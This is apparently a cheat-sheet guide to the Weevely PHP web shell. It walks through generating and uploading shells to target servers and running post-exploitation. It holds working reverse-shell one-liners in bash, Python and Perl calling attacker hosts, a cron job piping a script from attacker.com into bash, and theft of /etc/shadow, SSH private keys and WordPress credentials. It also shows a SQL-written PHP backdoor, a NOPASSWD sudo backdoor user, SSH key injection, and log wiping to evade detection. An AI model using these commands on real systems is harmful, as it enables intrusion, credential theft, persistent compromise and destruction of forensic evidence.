Weevely

Stealth PHP web shell with encrypted communication for post-exploitation including command execution, file management, privilege escalation, and lateral movement.

Overview

Weevely is a stealth PHP web shell that simulates a telnet-like connection for post-exploitation. It provides encrypted bidirectional communication, command execution, file management, and persistence capabilities.

Category: Web Shells & Post-Exploitation Language: PHP Communication: AES-256 encrypted HTTPS

Installation

Linux/Ubuntu

# Clone from GitHub
git clone https://github.com/epinna/weevely3.git
cd weevely3

# Install dependencies
sudo apt update
sudo apt install python3 python3-pip git

pip3 install -r requirements.txt

# Make executable
chmod +x weevely.py

# Optional: Create symlink
sudo ln -s $(pwd)/weevely.py /usr/local/bin/weevely

macOS

# Homebrew installation
brew install weevely

# Manual installation
git clone https://github.com/epinna/weevely3.git
cd weevely3
pip3 install -r requirements.txt
sudo ln -s $(pwd)/weevely.py /usr/local/bin/weevely

From Source

# Direct from GitHub
git clone https://github.com/epinna/weevely3.git
cd weevely3
python3 -m weevely --help

Basic Commands

Command	Description
weevely generate <password> <output.php>	Generate PHP web shell
weevely <URL> <password>	Connect to deployed shell
weevely --help	Display help information
weevely --version	Show version information
weevely <URL> <password> <command>	Execute single command

Web Shell Generation

Generate Shell

# Basic shell generation
weevely generate password123 shell.php

# Generate with custom agent name
weevely generate mypassword agent.php

# Generate with obfuscated output
weevely generate securepass shell.php --obfuscate

Shell Variations

# Generate shell with hardcoded password
weevely generate complex_pass backdoor.php

# Create minimal shell
weevely generate pass minimal.php --slim

# Generate for specific PHP version
weevely generate pass shell.php --php-version 7.4

Deployment

Upload Methods

# Via web form (file upload vulnerability)
# Upload shell.php through vulnerable upload form

# Via FTP
ftp targethost.com
put shell.php

# Via SCP
scp shell.php user@target:/var/www/html/

# Via WebDAV
curl -X PUT --data-binary @shell.php http://target.com/shell.php

# Via insecure deserialization or RCE
# Place shell.php in accessible location

Deployment Examples

# Deploy to WordPress uploads
# Transfer shell.php to /wp-content/uploads/

# Deploy to common locations
/var/www/html/
/var/www/
/home/*/public_html/
/usr/share/nginx/html/

# Verify deployment
curl http://target.com/shell.php

Connection & Session Management

Connect to Shell

# Connect to deployed shell
weevely http://target.com/shell.php mypassword

# Connect with custom URL parameter
weevely "http://target.com/shell.php?id=1" password

# Connect through proxy
weevely http://target.com/shell.php pass --proxy http://proxy:8080

Interactive Shell

# Once connected, interactive shell starts
:> whoami
:> pwd
:> ls -la
:> help

Single Command Execution

# Execute command without interactive session
weevely http://target.com/shell.php pass :system whoami

# Piped execution
weevely http://target.com/shell.php pass :system "cat /etc/passwd | head"

# Command with output redirection
weevely http://target.com/shell.php pass :system "id > /tmp/id.txt"

File Management

File Operations

# List directory contents
:> ls -la /home
:> find / -name "*.conf" 2>/dev/null

# Change directory
:> cd /var/www/html
:> pwd

# Display file contents
:> cat /etc/passwd
:> head -50 /var/www/html/config.php

Upload Files

# Upload local file
:> upload local_file.txt /tmp/

# Upload with permissions
:> upload exploit.sh /tmp/
:> chmod +x /tmp/exploit.sh

# Upload data exfiltration payload
:> upload data_stealer.py /var/www/

Download Files

# Download from target
:> download /etc/passwd

# Download application config
:> download /var/www/html/wp-config.php

# Download multiple files
:> download /etc/shadow
:> download /root/.ssh/id_rsa

File Browsing Module

# Use file module for browsing
:> file ls /home

# List with details
:> file ls -la /var/www

# Search for files
:> file find /home -name "*.txt"

# File permissions
:> file chmod 755 /tmp/shell.sh

# Create directories
:> file mkdir /tmp/staging

System Command Execution

Execute Commands

# Basic command execution
:> id
:> whoami
:> hostname

# Enumerate system
:> uname -a
:> cat /etc/os-release
:> lsb_release -a

# Check current privileges
:> sudo -l
:> groups
:> id -G

Information Gathering

# Network information
:> ifconfig
:> ip addr show
:> netstat -tuln
:> ss -tuln

# Process enumeration
:> ps aux
:> ps -ef

# Running services
:> systemctl list-units --type=service
:> service --status-all

# Installed software
:> dpkg -l
:> rpm -qa

Shell Access

# Spawn reverse shell
:> bash -i >& /dev/tcp/attacker_ip/port 0>&1

# Python reverse shell
:> python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

# Perl reverse shell
:> perl -e 'use Socket;$i="attacker";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

Database Interaction

SQL Module

# List databases
:> sql query "SHOW DATABASES;"

# Select current database
:> sql query "USE wordpress;"

# Enumerate tables
:> sql query "SHOW TABLES;"

# Dump table structure
:> sql query "DESCRIBE wp_users;"

# Extract data
:> sql query "SELECT * FROM wp_users;"

# Extract credentials
:> sql query "SELECT user_login, user_pass FROM wp_users;"

MySQL Enumeration

# Check MySQL version
:> sql query "SELECT VERSION();"

# Current user
:> sql query "SELECT USER();"

# File privileges
:> sql query "SELECT load_file('/etc/passwd');"

# Write files
:> sql query "INTO OUTFILE '/var/www/html/shell.php' SELECT '<?php system($_GET[cmd]); ?>';"

Network Pivoting

Network Reconnaissance

# Scan internal network
:> nmap -sV 192.168.1.0/24

# Port scanning
:> netstat -tuln | grep LISTEN
:> ss -tuln

# DNS resolution
:> nslookup internal-server
:> host internal.local

Lateral Movement

# Upload lateral movement tools
:> upload mimikatz.exe /tmp/
:> upload plink.exe /tmp/

# Proxy through shell for pivoting
weevely http://target.com/shell.php pass --proxy

# Create tunnel
:> ssh -D 1080 pivot@internal-host

Privilege Escalation

Enumeration

# Check sudo access
:> sudo -l

# Find SUID binaries
:> find / -perm -4000 2>/dev/null

# Check capabilities
:> getcap -r / 2>/dev/null

# Kernel version
:> uname -r

# Writable locations
:> find / -writable 2>/dev/null | grep -v proc

Exploitation

# Using system module
:> system sudoers

# Check cron jobs
:> cat /etc/crontab
:> ls -la /etc/cron.d/

# Upload exploit
:> upload linux-exploit.c /tmp/
:> gcc /tmp/linux-exploit.c -o /tmp/exploit
:> /tmp/exploit

Persistence Techniques

Create Backdoor Users

# Add new user (requires root)
:> useradd -m -s /bin/bash backdoor
:> echo "backdoor:password123" | chpasswd

# Add to sudo
:> echo "backdoor ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

Cron Persistence

# Add cron job
:> echo "* * * * * /bin/bash -i >& /dev/tcp/attacker/4444 0>&1" | crontab -

# Write to system cron
:> echo "* * * * * root curl http://attacker.com/update.sh | bash" > /etc/cron.d/update

Web Shell Placement

# Multiple shells in different locations
:> cp /var/www/html/shell.php /tmp/shell.php
:> cp /var/www/html/shell.php /home/user/shell.php
:> cp /var/www/html/shell.php /var/tmp/shell.php

SSH Key Injection

# Add authorized key
:> mkdir -p ~/.ssh
:> echo "ssh-rsa AAAA...key..." >> ~/.ssh/authorized_keys
:> chmod 700 ~/.ssh
:> chmod 600 ~/.ssh/authorized_keys

Obfuscation & OPSEC

Obfuscation Techniques

# Generate obfuscated shell
weevely generate password shell.php --obfuscate

# Custom user agent
:> system "curl -A 'Mozilla/5.0' http://internal.local/check"

# Encode commands
:> base64 sensitive_command
:> echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | bash

Stealth Operations

# Disable bash history
:> export HISTFILE=/dev/null
:> unset HISTFILE

# Clear logs
:> cat /dev/null > /var/log/auth.log
:> echo "" > /var/log/apache2/access.log

# Remove traces
:> rm -f ~/.bash_history
:> history -c

Traffic Evasion

# Use HTTPS for encryption
weevely https://target.com/shell.php password

# Randomize requests
:> system "sleep $((RANDOM % 300)) && curl http://target.com/check"

# Fragment payload
# Break large commands into smaller chunks

Modules Reference

Audit Module

# System audit
:> audit modules

# Check configurations
:> audit disk
:> audit net

Backdoor Module

# Create backdoors
:> backdoor

# Web backdoor
:> backdoor shell

Bruteforce Module

# Brute force credentials
:> bruteforce ftp
:> bruteforce ssh

# Dictionary attack
:> bruteforce http --wordlist=/path/to/dict

File Module

# Advanced file operations
:> file ls
:> file upload
:> file download
:> file cat
:> file chmod

Net Module

# Network tools
:> net scan
:> net proxy
:> net dump

SQL Module

# Database interaction
:> sql query "SELECT VERSION();"
:> sql dump
:> sql connect

System Module

# System operations
:> system info
:> system priv
:> system whoami

Module Usage

List All Modules

:> help

Get Module Help

# General help
:> help <module>

# Specific command help
:> <module> --help

Module Examples

# File operations
:> file ls /home
:> file upload payload.sh /tmp/
:> file download /etc/passwd

# Network scanning
:> net scan 192.168.1.0/24

# SQL queries
:> sql query "SELECT * FROM users;"

# System information
:> system uname

OPSEC Considerations

Safe Practices

• Use strong, unique passwords for each shell
• Rotate shells regularly
• Clean up uploaded files and logs
• Use HTTPS over HTTP when possible
• Minimize command output and logging

Detection Evasion

# Blend with legitimate traffic
:> User-Agent rotation
:> Timing variations between requests
:> Legitimate looking HTTP headers

# File integrity
:> Keep shell permissions consistent
:> Use timestamps matching other files
:> Avoid suspicious file names

Cleanup Operations

# Remove shells
:> find / -name "shell.php" -delete

# Clear logs
:> echo "" > /var/log/apache2/access.log
:> truncate -s 0 /var/log/auth.log

# Remove artifacts
:> history -c
:> rm -rf /tmp/uploaded_files

Troubleshooting

Connection Issues

# Verify shell is accessible
curl http://target.com/shell.php

# Check firewall
:> telnet target.com 80

# Proxy issues
weevely http://target.com/shell.php pass --proxy http://proxy:8080

Permission Errors

# Check file permissions
:> ls -la /var/www/html/shell.php

# Fix permissions
:> chmod 755 /var/www/html/shell.php

# Check PHP execution
:> apache2ctl status

Module Failures

# Verify module availability
:> help

# Check dependencies
:> system "which nmap"
:> system "which curl"

# Update Weevely
git pull
pip3 install -r requirements.txt

Examples

Initial Access Workflow

# 1. Generate shell
weevely generate Complex@Pass2024 shell.php

# 2. Upload through vulnerability
# Use identified file upload, RCE, or misconfig

# 3. Connect and verify
weevely http://target.com/uploads/shell.php Complex@Pass2024

# 4. Enumerate system
:> whoami
:> id
:> uname -a

Post-Exploitation Workflow

# 1. Information gathering
:> cat /etc/passwd
:> sudo -l
:> find / -perm -4000 2>/dev/null

# 2. Privilege escalation
:> system "exploit-suggester.sh"
:> gcc /tmp/exploit.c -o /tmp/exploit
:> /tmp/exploit

# 3. Persistence
:> echo "backdoor ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
:> crontab -e  # Add reverse shell

# 4. Data exfiltration
:> upload sensitive_data.tar.gz
:> download /home/user/documents/

Lateral Movement Workflow

# 1. Enumerate network
:> ifconfig
:> arp -a

# 2. Scan internal network
:> nmap -sV 192.168.1.0/24

# 3. Deploy to discovered hosts
:> scp shell.php user@internal-host:/tmp/

# 4. Create tunnel for pivoting
weevely http://internal-host/tmp/shell.php password

Security References

• OWASP Web Shell Guidelines
• NIST Incident Response Procedures
• CWE-94: Improper Control of Generation of Code
• ATT&CK Framework - Web Shell (T1505.003)
• CVE Database for PHP vulnerabilities